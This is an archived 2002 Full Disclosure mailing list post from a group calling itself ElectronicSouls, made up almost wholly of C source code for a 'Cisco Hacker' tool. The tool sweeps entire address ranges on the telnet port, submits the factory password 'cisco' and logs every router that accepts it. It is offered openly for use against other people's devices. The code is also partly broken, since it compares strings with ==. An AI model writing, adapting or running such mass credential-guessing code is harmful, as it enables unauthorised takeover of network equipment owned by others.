Full Disclosure mailing list archives
[ElectronicSouls] Cisco scanner
From: es () hush com
Date: Fri, 29 Nov 2002 01:56:51 -0800
-----BEGIN PGP SIGNED MESSAGE----- Your cisco routers are not safe. /* 4553-Cisco Scanner Cisco Scanner will scan for Cisco Routers that still got their default password set. */ #include <stdio.h> #include <signal.h> #include <stdlib.h> #include <netinet/in.h> #include <arpa/inet.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/uio.h> #include <netdb.h> #include <errno.h> #include <unistd.h> #define ES struct sockaddr #define SIZE sizeof(struct sockaddr_in) #define ADDR 16 int ConnectCheck(struct sockaddr_in, int); const char *ipv4_ntop(int, const void *, char *, size_t); FILE *stream; int main(int argc, char *argv[]) { int i=0, o=0, p=0, status, childs=120, timeout=5, class=0; char IP[15],*NET,c; struct sockaddr_in DestAddress; if(argc < 3) { printf(" 0x4553\n"); printf(" usage: %s <IP> <class> [option]\n",argv[0]); printf(" class A : %s 234 A \n",argv[0]); printf(" class B : %s 234.10 B \n",argv[0]); printf(" class C : %s 234.10.23 C \n",argv[0]); printf(" -c childs \n"); printf(" -t timeout \n"); printf(" Output: enable.cisco \n\n"); exit(1); } NET = argv[1]; class = argv[2]; opterr = 0; while((c = getopt(argc, argv, "c:t:")) != -1) { switch(c) { case 'c': childs = atoi(optarg); break; case 't': timeout = atoi(optarg); break; } } if(childs < 1) { printf("invalid number of childs\n"); exit(1); } if(timeout < 1) { printf("invalid timeout\n"); exit(1); } printf("\n\n-= 0x4553 Cisco Hacker =-\n"); printf("-= scan's for cisco's with factory password set. =-\n"); printf("-= (C) ElectronicSouls. =-\n\n"); if (class=="A") fprintf(stderr, "Scanning: %s.*.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout); if (class=="B") fprintf(stderr,"Scanning: %s.*.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n", NET,childs,timeout); if (class=="C") fprintf(stderr,"Scanning: %s.*\n output:cisco.txt\n threads:%i\n timeout:%i\n\n",NET,childs,timeout); DestAddress.sin_family = AF_INET; DestAddress.sin_port = htons(23); if (class=="A") { for(p = 0; p < 256; p++) { for(o = 0; o < 256; o++) { for(i = 0; i < 256; i++) { if (i > childs || o > 0 || p > 0 ) { wait(&status); } sprintf(IP, "%s.%d.%d.%d", NET,p,o,i); inet_aton(IP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, timeout); } } } } if (class=="B") { for(o = 0; o < 256; o++) { for(i = 0; i < 256; i++) { if (i > childs || o > 0) { wait(&status); } sprintf(IP, "%s.%d.%d", NET,o,i); inet_aton(IP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, timeout); } } } if (class=="C") { for(i = 0; i < 256; i++) { if (i > childs) { wait(&status); } sprintf(IP, "%s.%d", NET, i); inet_aton(IP, &DestAddress.sin_addr); if(!fork()) ConnectCheck(DestAddress, timeout); } } for(;;) { if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD)) exit(0); } } int ConnectCheck(struct sockaddr_in DestAddr, int timeout) { int result,ret,sock; char Hostname[60],buffer1[64],buffer2[64]; if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE); alarm(timeout); result = connect(sock, (ES *)&DestAddr, SIZE); if (!result) { alarm(timeout); memset(buffer1, '\0', 64); memset(buffer2, '\0', 64); if ((ret = read(sock, buffer1, 64)) > 0) { ret = read(sock, buffer1, 64); send(sock,"cisco\r",6,0); ret = read(sock, buffer2, 64); if( (memcmp(buffer2,"\r\nPass",6)) && !(memcmp(buffer1,"\r\n\r\nUser Access Verification\r\n\r\nPassword",40))) { stream = fopen("enable.cisco","a"); printf("[!] -- Cisco found: %s --\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fprintf(stream,"%s\n", ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59)); fclose(stream); } } close(sock); } exit(0); } const char * ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) { const u_char *es = (const u_char *)addrptr; if(family == AF_INET) { char temp[ADDR]; snprintf(temp, sizeof(temp), "%d.%d.%d.%d", es[0], es[1], es[2], es[3]); strcpy(strptr, temp); return(strptr); } printf("Address family not supported by protocol.\n"); return(0); } The Electronic Souls Crew [ElectronicSouls] (c) 2002 "Talking to me, punk?" -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nPCAMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltyg0AoKlg+3BuyQWs U4rEK1oCrfYhpgViAJ9qF1K1T0BeWK9KDFoxauS5CCdZmg== =GNfO -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] Cisco scanner es (Nov 29)